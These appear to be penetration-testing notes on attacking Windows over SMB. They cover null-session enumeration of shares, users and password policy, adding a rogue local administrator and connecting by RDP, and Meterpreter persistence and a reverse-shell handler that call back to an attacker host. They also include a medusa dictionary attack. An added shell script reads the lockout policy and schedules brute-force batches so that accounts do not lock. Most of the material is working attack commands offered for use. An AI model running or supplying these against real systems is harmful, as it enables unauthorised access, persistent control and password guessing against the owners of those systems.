SMB and null sessions
Windows:
nbtstat -A ip
net view \\ip
Linux:
nmblookup -A ip
smbclient -L //192.168.1.1 -N
smbclient also lists the administrative shares (names ending in $: ADMIN$, C$, IPC$) that standard Windows tools such as net view hide.
Null sessions are a piece of Windows hacking history: an anonymous SMB session (empty username and empty password) that older Windows versions accepted by default.
Check for a null session:
verify by connecting to the IPC$ administrative share without valid credentials (empty user and empty password); if the connection succeeds, the host is open to anonymous enumeration:
Windows: net use \\ip\IPC$ "" /u:""
Linux: smbclient //ip/IPC$ -N
enum -S ip (enum shares)
enum -U ip (enum users)
enum -P ip (check pass policy)
enum4linux ip (wraps the same share, user and password policy enumeration)
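Added example, not from the original notes: a small parser for the share listing that `smbclient -L //ip -N` prints, which decides whether the anonymous session was accepted and separates the hidden administrative shares (names ending in $) from the ordinary ones. The two sample outputs are constructed to mimic smbclient's listing and its access-denied error; they are not real captures, and the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original notes: classify the output of
# `smbclient -L //ip -N` (null-session share listing). The two samples below
# are constructed to mimic smbclient's listing and its access-denied error;
# they are not real captures. Tabs in real output are spaces here.

SAMPLE_LISTING='
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Public          Disk
        Finance         Disk      Quarterly reports

SMB1 disabled -- no workgroup available'

SAMPLE_DENIED='session setup failed: NT_STATUS_ACCESS_DENIED'

# null_session_ok OUTPUT -> status 0 if the anonymous session was accepted
# (a share table came back), 1 if the server rejected the anonymous bind.
null_session_ok() {
    case "$1" in
        *NT_STATUS_ACCESS_DENIED*|*NT_STATUS_LOGON_FAILURE*) return 1 ;;
    esac
    printf '%s\n' "$1" | grep -q 'Sharename'
}

# list_shares OUTPUT [all|hidden|visible] -> one share name per line.
# "hidden" = administrative shares whose name ends in '$' (ADMIN$, C$, IPC$),
# which `net view` on Windows does not display.
list_shares() {
    mode=${2:-all}
    printf '%s\n' "$1" | awk -v mode="$mode" '
        /^[ \t]+Sharename[ \t]+Type/ { inside = 1; next }   # table header
        inside && /^[ \t]+-+[ \t]+-+/ { next }              # dashed underline
        inside && $0 !~ /^[ \t]/     { inside = 0 }         # table ended
        !inside                      { next }
        {
            name = $1
            hidden = (substr(name, length(name), 1) == "$")
            if (mode == "all" || (mode == "hidden" && hidden) ||
                (mode == "visible" && !hidden))
                print name
        }'
}

# Stand-alone run: report on the constructed samples.
if null_session_ok "$SAMPLE_LISTING"; then
    echo "null session accepted; hidden/administrative shares:"
    list_shares "$SAMPLE_LISTING" hidden
    echo "ordinary shares:"
    list_shares "$SAMPLE_LISTING" visible
fi
null_session_ok "$SAMPLE_DENIED" || echo "anonymous bind rejected (expected for the denied sample)"
```

In practice feed the functions the captured output (`out=$(smbclient -L //ip -N 2>&1)`); the same name-based split applies to the share list enum -S or enum4linux return, since the $ suffix is what marks a share as hidden.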
Check the password policy before running an authentication attack. Knowing the lockout threshold, the lockout reset window and the minimum password length lets you tune the attack tool to: prevent account lockouts (keep guesses per account per window below the threshold), prevent false positives, and choose a dictionary or adjust the bruteforcer configuration (drop candidates the policy would never have accepted).
Add a local administrator on a compromised host and RDP in with it:
net user admin pass /add
net localgroup administrators admin /add
xfreerdp /u:"admin" /v:10.2.29.226:3389
Persistence from a Meterpreter session:
run persistence -U -i 5 -p 443 -r 10.10.11.3
(-U: start on user logon, -i: callback interval in seconds, -p/-r: port and host the payload calls back to)
or install it as a service:
background
use exploit/windows/local/persistence_service
show options
set SESSION 1
exploit
Test the callback: background, kill the existing sessions and start a handler for the persistence payload (PAYLOAD, LHOST and LPORT must match what the persistence payload was built with, i.e. the -r/-p values above or the module's payload options):
background
sessions -K
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.15.2
set LPORT 4444
exploit
Wordlist used below: /root/Desktop/wordlists/100-common-passwords.txt
Check what the guest account can reach on the shares:
smbmap -u guest -d EVILCORP -H 192.166.155.3
Dictionary attack against one user over SMB (size it to the password policy enumerated above):
medusa -M smbnt -h 192.166.155.3 -u william -P /root/Desktop/wordlists/100-common-passwords.txt
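Added example, not from the original notes: it ties the password-policy check to the medusa run. It reads the policy as enum4linux/polenum report it (the POLICY text is constructed to mimic those lines), drops wordlist entries shorter than the minimum length, and splits the rest into batches of two guesses below the lockout threshold, printing one medusa command per batch with a sleep for the reset window in between. The ten-entry WORDLIST stands in for 100-common-passwords.txt, the function names and the "two below the threshold" margin are my choices, and the medusa flags are the ones used above.

```shell
#!/bin/sh
# Added example, not from the original notes: size an SMB dictionary attack
# from the domain password policy so it stays under the lockout threshold.
# POLICY mimics the polenum-style lines enum4linux prints; WORDLIST is a
# ten-entry stand-in for 100-common-passwords.txt. Both are constructed.

POLICY='[+] Minimum password length: 7
[+] Password history length: 24
[+] Password Complexity Flags: 000000
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: 5'

WORDLIST='123456
password
letmein
Password1
Summer2023
welcome
P@ssw0rd
qwerty
Winter2023!
admin123'

# policy_value POLICY KEY -> the integer following "KEY:", or 0 if absent
# (Windows reports lockout threshold 0 when lockout is disabled).
policy_value() {
    printf '%s\n' "$1" | awk -F': *' -v key="$2" '
        index($1, key) { v = $2; sub(/[^0-9]*$/, "", v); print v + 0; found = 1; exit }
        END { if (!found) print 0 }'
}

# filter_by_policy WORDLIST MINLEN -> drop candidates the policy could never
# have accepted; fewer attempts spent and fewer spurious hits to chase.
filter_by_policy() {
    printf '%s\n' "$1" | awk -v min="$2" 'length($0) >= min'
}

# attempts_per_window THRESHOLD -> guesses per account per reset window.
# Two below the threshold leaves headroom for the real user's own typos;
# 0 means no lockout policy (design choice of this example).
attempts_per_window() {
    [ "$1" -gt 0 ] || { echo 0; return; }
    n=$(( $1 - 2 ))
    [ "$n" -ge 1 ] || n=1
    echo "$n"
}

# batch_count TOTAL PER_BATCH -> number of batches (ceiling division)
batch_count() {
    echo $(( ($1 + $2 - 1) / $2 ))
}

# plan_spray POLICY WORDLIST HOST USER -> prints the medusa commands to run,
# one per batch, with a sleep for the reset window between them.
plan_spray() {
    minlen=$(policy_value "$1" "Minimum password length")
    threshold=$(policy_value "$1" "Lockout Threshold")
    window=$(policy_value "$1" "Reset Account Lockout Counter")
    per_batch=$(attempts_per_window "$threshold")
    workdir=$(mktemp -d)
    filter_by_policy "$2" "$minlen" > "$workdir/candidates"
    total=$(wc -l < "$workdir/candidates" | tr -d ' ')
    [ "$total" -gt 0 ] || { echo "no candidates satisfy the policy" >&2; return 1; }
    [ "$per_batch" -gt 0 ] || per_batch=$total      # no lockout: single batch
    ( cd "$workdir" && split -l "$per_batch" candidates batch_ )
    first=1
    for f in "$workdir"/batch_*; do
        [ "$first" -eq 1 ] || printf 'sleep %d   # %d-minute lockout reset window\n' $(( window * 60 )) "$window"
        first=0
        printf 'medusa -M smbnt -h %s -u %s -P %s\n' "$3" "$4" "$f"
    done
}

# Stand-alone run against the constructed samples.
plan_spray "$POLICY" "$WORDLIST" 192.166.155.3 william
```

With the constructed policy (threshold 5, reset 30 minutes, minimum length 7) the ten entries shrink to eight and run as three batches of at most three guesses with 30-minute pauses. The counter is per account, so the limit applies to each user separately; spraying one candidate across many users is the usual way to stay under it while still covering the list.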
Enumerate shares (to find hidden shares): enum4linux -s guesses share names from the given wordlist, so shares that a listing does not return can still be found; here the password list is reused as the name list:
enum4linux -s ~/Desktop/wordlists/100-common-passwords.txt demo.host.local